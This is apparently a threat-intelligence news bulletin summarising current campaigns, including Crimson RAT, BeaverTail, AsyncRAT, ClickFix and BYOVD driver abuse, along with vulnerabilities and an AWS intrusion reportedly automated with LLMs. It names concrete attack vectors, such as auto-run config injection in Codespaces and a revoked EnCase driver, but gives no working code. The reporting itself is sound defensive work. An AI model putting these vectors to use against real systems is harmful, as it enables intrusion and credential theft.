ThreatsDay Bulletin: Codespaces RCE, AsyncRAT C2, BYOVD Abuse, AI Cloud Intrusions & 15+ Stories

In a sign that the threat actor has moved beyond government targets, the Pakistan-aligned APT36 threat actor has been observed targeting India's startup ecosystem, using ISO files and malicious LNK shortcuts using sensitive, startup-themed lures to deliver Crimson RAT, enabling comprehensive surveillance, data exfiltration, and system reconnaissance. The initial access vector is a spear-phishing email carrying an ISO image. Once executed, the ISO contains a malicious shortcut file and a folder holding three files: a decoy document, a batch script that acts as the persistence mechanism, and the final Crimson RAT payload, disguised as an executable named Excel. "Despite this expansion, the campaign remains closely aligned with Transparent Tribe's historical focus on Indian government and defense-adjacent intelligence collection, with overlap suggesting that startup-linked individuals may be targeted for their proximity to government, law enforcement, or security operations," Acronis said.

The threat activity cluster known as ShadowSyndicate has been linked to two additional SSH markers that connect dozens of servers to the same cybercrime operator. These hosts are then used for a wide range of malicious activities by various threat clusters linked to Cl0p, BlackCat, Ryuk, Malsmoke, and Black Basta. A notable finding is that the threat actor tends to transfer servers between their SSH clusters. ShadowSyndicate continues to be associated with toolkits including Cobalt Strike, Metasploit, Havoc, Mythic, Sliver, AsyncRAT, MeshAgent, and Brute Ratel. "The threat actor tends to reuse previously employed infrastructure, sometimes rotating various SSH keys across their servers," Group-IB said. "If such a technique is performed correctly, the infrastructure is transferred subsequently, much like in a legitimate scenario, when a server goes to a new user."

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has tweaked 59 actively exploited vulnerability notices in 2025 to reflect their use by ransomware groups. That list includes 16 entries for Microsoft, six for Ivanti, five for Fortinet, three for Palo Alto Networks, and three for Zimbra. "When it flips from 'Unknown' to 'Known,' reassess, especially if you've been deprioritizing that patch because 'it's not ransomware-related yet," GreyNoise's Glenn Thorpe said.

Polish authorities have detained a 60-year-old employee of the country's defense ministry on suspicion of spying for a foreign intelligence agency. The suspect worked in the Ministry of National Defense’s strategy and planning department, including on military modernization projects, officials said. While the name of the country was not revealed, Polish state officials told local media that the suspect had worked with Russian and Belarusian intelligence services. In a related development, Poland's Central Bureau for Combating Cybercrime (CBZC) said a 20-year-old man has been arrested for allegedly conducting distributed denial-of-service (DDoS) attacks on high-profile websites, including those of strategic importance. The individual faces six charges and a potential five-year prison sentence.

Multiple attack vectors have been disclosed in GitHub Codespaces that allow remote code execution simply by opening a malicious repository or pull request. The identified vectors include: (1) .vscode/settings.json with PROMPT_COMMAND injection, (2) .devcontainer/devcontainer.json with postCreateCommand injection, and (3) .vscode/tasks.json with folderOpen auto-run tasks. "By abusing VSCode-integrated configuration files that Codespaces automatically respects, an adversary can execute arbitrary commands, exfiltrate GitHub tokens and secrets, and even abuse hidden APIs to access premium Copilot models," Orca Security researcher Roi Nisimi said. Microsoft has deemed the behavior to be by design. 

The financial sector in the Nordics has been targeted by the North Korea-linked Lazarus Group as part of a long-running campaign dubbed Contagious Interview that drops a stealer and downloads a named BeaverTail. "BeaverTail contains functionality that will automatically search the victim's machine for cryptocurrency-related data, but can also be used as a remote access tool for further attacks," TRUESEC said.

In a new analysis, SOCRadar said the pro-Russian hacktivist outfit known as NoName057(16) is using a volunteer-distributed DDoS weapon called DDoSia Project to disrupt government, media, and institutional websites tied to Ukraine and Western political interests. Through active Telegram channels with over 20,000 followers, the group frames the disruptive (but non-destructive) attacks as "self-defense" against Western aggression and provides real-time evidence of successful disruptions. Its ideologically driven campaigns often coincide with major geopolitical events, countering sanctions and military aid announcements with retaliatory cyber attacks. "Unlike traditional botnets that compromise systems without user knowledge, DDoSia operates on a disturbing premise: thousands of willing participants knowingly install the tool and coordinate attacks against targets designated by the group's operators," SOCRadar said. "Through propaganda, gamification, and cryptocurrency rewards, NoName057(16) has built a distributed attack force that requires minimal technical skill to join, yet demonstrates remarkable operational sophistication." According to Censys, targeting of the purpose-built tool is heavily focused on Ukraine, European allies, and NATO states in government, military, transportation, public utilities, financial, and tourism sectors.

A major cybercriminal operation dubbed Rublevka Team specializes in large-scale cryptocurrency theft since its inception in 2023, generating over $10 million through affiliate-driven wallet draining campaigns. "Rublevka Team is an example of a 'traffer team,' composed of a network of thousands of social engineering specialists tasked with directing victim traffic to malicious pages," Recorded Future said. "Unlike traditional malware-based approaches such as those used by the trafficker teams Markopolo and Crazy Evil, Rublevka Team deploys custom JavaScript scripts via spoofed landing pages that impersonate legitimate crypto services, tricking victims into connecting their wallets and authorizing fraudulent transactions." Rublevka Team offers affiliates access to fully automated Telegram bots, landing page generators, evasion features, and support for over 90 wallet types. This further lowers the technical barrier to entry, allowing the threat actors to build an extensive ecosystem of global affiliates capable of launching high-volume scams with minimal oversight. Rublevka Team's primary Telegram channel has approximately 7,000 members to date.

Microsoft is urging customers to secure their infrastructure with Transport Layer Security (TLS) version 1.2 for Azure Blob Storage, and remove dependencies on TLS version 1.0 and 1.1. "On February 3, 2026, Azure Blob Storage will stop supporting versions 1.0 and 1.1 of Transport Layer Security (TLS)," Microsoft said. "TLS 1.2 will become the new minimum TLS version. This change impacts all existing and new blob storage accounts, using TLS 1.0 and 1.1 in all clouds. Storage accounts already using TLS 1.2 aren't impacted by this change."

In a new campaign, fake voicemail messages with bank-themed subdomains have been found to direct targets to a convincing "listen to your message" experience that's designed to look routine and trustworthy. In reality, the attack leads to the deployment of Remotely RMM, a legitimate remote access software, that enrolls the victim system into an attacker-controlled environment to enable persistent remote access and management. "The flow relies on social engineering rather than exploits, using lures to persuade users to approve installation steps," Censys said. "The end goal is installation of an RMM (remote monitoring and management) tool, enrolling the device into an attacker-controlled environment."

A long-running malware operation known as SystemBC (aka Coroxy or DroxiDat) has been tied to more than 10,000 infected IP addresses globally, including systems associated with sensitive government infrastructure in Burkina Faso and Vietnam. The highest concentration of infected IP addresses has been observed in the U.S., followed by Germany, France, Singapore, and India, per Silent Push. Known to be active since at least 2019, the malware is commonly used to proxy traffic through compromised systems, to maintain persistent access to internal networks, or deploy additional malware. "SystemBC-associated infrastructure presents a sustained risk due to its role early in intrusion chains and its use across multiple threat actors," Silent Push said. "Proactive monitoring is critical, as activity tied to SystemBC is often a precursor to ransomware deployment and other follow-on abuse."

A new spear-phishing campaign using business-themed lures has been observed luring users into running a Windows screensaver (.SCR) file that discreetly installs a legitimate RMM tool like SimpleHelp, giving attackers interactive remote control. "The delivery chain is built to evade reputation-based defenses by hiding behind trusted services," ReliaQuest said. "This reduces attacker-owned infrastructure and makes takedown and containment slower and less straightforward. SCR files are a reliable initial-access vector because they're executables that don't always receive executable-level controls. When users download and run them from email or cloud links, attackers can trigger code execution while bypassing policies tuned primarily for EXE and MSI files."

Threat actors are abusing a legitimate but revoked Guidance Software (EnCase) kernel driver as part of a bring your own vulnerable driver (BYOVD) attack to elevate privileges and attempt to disarm 59 security tools. In an attack observed earlier this month, attackers leveraged compromised SonicWall SSL-VPN credentials to gain initial access to a victim network and deployed an EDR that abused the driver ("EnPortv.sys") to terminate security processes from kernel mode. "The attack was disrupted before ransomware deployment, but the case highlights a growing trend: threat actors weaponizing signed, legitimate drivers to blind endpoint security," Huntress researchers Anna Pham and Dray Agha said. "The EnCase driver's certificate expired in 2010 and was subsequently revoked, yet Windows still loads it, a gap in Driver Signature Enforcement that attackers continue to exploit."

Security researchers have discovered a coding mistake in Nitrogen ransomware that causes it to encrypt all the files with the wrong public key, irrevocably corrupting them. "This means that even the threat actor is incapable of decrypting them, and that victims that are without viable backups have no ability to recover their ESXi encrypted servers," Coveware said. "Paying a ransom will not assist these victims, as the decryption key/ tool will not work."

An offensive cloud operation targeting an Amazon Web Services (AWS) environment went from initial access to administrative privileges in eight minutes. The speed of the attack notwithstanding, Sysdig said the activity bears hallmarks of large language model (LLM) use to automate reconnaissance, generate malicious code, and make real-time decisions. "The threat actor gained initial access to the victim's AWS account through credentials discovered in public Simple Storage Service (S3) buckets," Sysdig said. "Then, they rapidly escalated privileges through Lambda function code injection, moved laterally across 19 unique AWS principals, abused Amazon Bedrock for LLMjacking, and launched GPU instances for model training."

A phishing scheme has utilized phishing emails themed around procurements and tenders to distribute PDF attachments that initiate a multi-stage attack chain to steal users' Dropbox credentials and send them to a Telegram bot. Once the data is transmitted, it simulates a login process using a 5-second delay and is configured to display an "Invalid email or password" error message. "The malicious chain relies on seemingly legitimate cloud infrastructure, such as Vercel Blob storage, to host a PDF that ultimately redirects victims to a Dropbox-impersonation page designed to harvest credentials," Forcepoint said. "Because Dropbox is a familiar and trusted brand, the request for credentials appeared reasonable to the unsuspecting users. It’s here that the campaign moves from deception to impact."

A critical-rated security flaw in Sandboxie (CVE-2025-64721, CVSS score: 9.9) has been disclosed that, if successfully exploited, could allow sandboxed processes to execute arbitrary code as SYSTEM, fully compromising the host. The problem is rooted in a service named "SboxSvc.exe," which runs with SYSTEM permissions and functions as the "Responsible Adult" between sandboxed processes and the real computer resources. The issue has been addressed in version 1.16.7. "In this case, the reliance on manual C-style pointer arithmetic over a safe interface definition (like IDL) left a gap," depthfirst researcher Mav Levin, who discovered the vulnerability, said. "A single missing integer overflow check, coupled with implicit trust in client-provided message lengths, turned the Responsible Adult into a victim."

Attack surface management platform Censys said it's tracking 57 active AsyncRAT-associated hosts exposed on the public internet as of January 2026. First released in 2019, AsyncRAT enables long-term unauthorized access and post-compromise control, making it a reliable tool for credential theft, lateral movement staging, and follow-on payload delivery. Out of the 57 total assets, the majority are hosted on APIVERSA (13% of hosts), Contabo networks (11% combined), and AS-COLOCROSSING (5.5%), indicating operators prioritize low-cost, abuse-tolerant hosting over major cloud providers. "These hosts are primarily concentrated within a small number of VPS-focused autonomous systems and frequently reuse a distinctive self-signed TLS certificate identifying the service as an 'AsyncRAT Server,' enabling scalable discovery of related infrastructure beyond sample-based detection," Censys said.

An analysis of various campaigns mounted by Chinese hacking groups Violet Typhoon and Volt Typhoon has revealed the use of some common tactics: exploiting zero-day flaws in edge devices, living-off-the-land (LotL) techniques to traverse networks and hide within normal network activity, and Operational Relay Box (ORB) networks to conceal espionage operations. "Not only will Chinese nation-state threat actors almost certainly continue to pursue high-value targets, but it is probable they will scale up their operations to conduct global campaigns and target as many entities in each region or sector as possible to maximize their gains at every exploitation," Intel471 said. "The acceleration of improvements in the cybersecurity posture of numerous key targeted countries has compelled Chinese state-sponsored intelligence forces to become more innovative with their attack strategies."

Threat actors are using a framework named IClickFix that can be used to build ClickFix pages on hacked WordPress sites. According to security firm Sekoia, the framework has been live on more than 3,800 sites since December 2024. "This cluster uses a malicious JavaScript framework injected into compromised WordPress sites to display the ClickFix lure and deliver NetSupport RAT," the French cybersecurity company said. The malware distribution campaign leverages the ClickFix social engineering tactic through a Traffic Distribution System (TDS). It's suspected that the attacker abuses the open-source URL shortener YOURLS as the TDS. In recent months, threat actors have also been found using another TDS called ErrTraffic to inject malicious JavaScript in compromised websites so as to cause them to glitch and then suggest a fix to address the non-existent problem.